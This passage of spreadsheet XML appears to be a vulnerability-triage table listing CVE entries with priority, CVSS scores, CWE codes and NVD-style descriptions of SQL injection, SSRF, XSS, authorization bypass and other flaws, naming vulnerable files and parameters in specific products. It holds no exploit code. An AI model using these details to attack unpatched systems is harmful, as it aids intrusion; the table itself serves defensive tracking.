      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The impacted element is an unknown function of the file delivery/deliverysignup.php of the component Registration Page. This manipulation of the argument username/email/location causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105232</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105238</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ChatGPTNextWeb NextChat up to 2.16.1. This vulnerability affects the function proxyHandler of the file app/api/proxy.ts of the component Proxy Fallback Handler. This manipulation of the argument x-base-url causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105238</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105246</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Online Reviewer Management System 1.0. Impacted is an unknown function of the file /reviewer_0/admins/assessments/Subject/btn_functions.php?action=update. Performing a manipulation of the argument Subject results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105246</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103062</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cozmoslabs TranslatePress translatepress-multilingual allows Stored XSS.This issue affects TranslatePress: from n/a through 3.3.6.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103062</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103344</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S4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45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103344</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103354</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liquid Web / StellarWP Gutenberg Blocks by Kadence Blocks kadence-blocks allows Stored XSS.This issue affects Gutenberg Blocks by Kadence Blocks: from n/a through 3.7.11.1.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103354</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97276</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP Statistics wp-statistics allows Reflected XSS.This issue affects WP Statistics: from n/a through 14.16.14.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97276</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100727</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>An improper access control vulnerability exists in GROWI, which allow an unauthenticated attacker to read files contained in non-public pages of the affected product when the file upload setting is configured as "Local".</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100727</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105306</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Dynamic Client Registration flow of the Keycloak identity and access management server. The issue occurs because the registration process fails to filter security-sensitive client attributes when a new client is created. An attacker with a valid Initial Access Token can register a client that bypasses audience checks during token introspection. This allows the attacker to view sensitive identity information, roles, and session details from access tokens belonging to other applications in the same realm.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105306</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105141</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in topoteretes cognee up to 1.5.4. The affected element is the function get_user_id_by_email of the file cognee/modules/users/authentication/get_api_auth_backend.py of the component JWT Signing Key Handler. The manipulation of the argument FASTAPI_USERS_JWT_SECRET results in hard-coded credentials. The attack may be launched remotely. Upgrading to version 1.6.0 is sufficient to fix this issue. The patch is identified as fa65fc0cd86cdba48d19aa76e36be862be982f5d. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105141</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105165</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-275, CWE-732</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in devopspolis secrets-replicator up to 0.4.0. Impacted is the function process_single_secret of the file src/handler.py of the component AssumeRole Handler. Such manipulation of the argument external_id leads to incorrect permission assignment. The attack can be executed remotely. Upgrading to version 0.5.0 is recommended to address this issue. The name of the patch is b42239405fbf4fae3c3f0048fc0b4225112edceb. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105165</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105168</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This affects an unknown function of the file admin/admin.php of the component Order Assignment Block. The manipulation of the argument order_id/delivery_person_id leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105168</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105171</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. Affected by this vulnerability is an unknown functionality of the file admin/admin.php of the component Role Attribute Handler. Such manipulation of the argument Name leads to authorization bypass. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105171</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105180</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>6.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-913, CWE-915</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Jeebase 0.0.1. This vulnerability affects the function updateUser of the file /user/update/info of the component UserService. Executing a manipulation of the argument user/tempUser can lead to dynamically-determined object attributes. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105180</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105181</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>6.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in itsourcecode Online Admission System 1.0. This issue affects some unknown processing of the file register1.php. The manipulation of the argument fname leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105181</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105186</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Online Admission System 1.0. This impacts an unknown function of the file /new.php. Executing a manipulation of the argument schedid can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105186</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105187</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>6.3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2026-10-05</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Online Admission System 1.0. Affected is an unknown function of the file /admin/key.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105187</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105233</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>6.3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2026-10-05</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This affects an unknown function of the file login.php of the component Login Flow. Such manipulation of the argument PHPSESSID leads to session fixiation. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105233</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
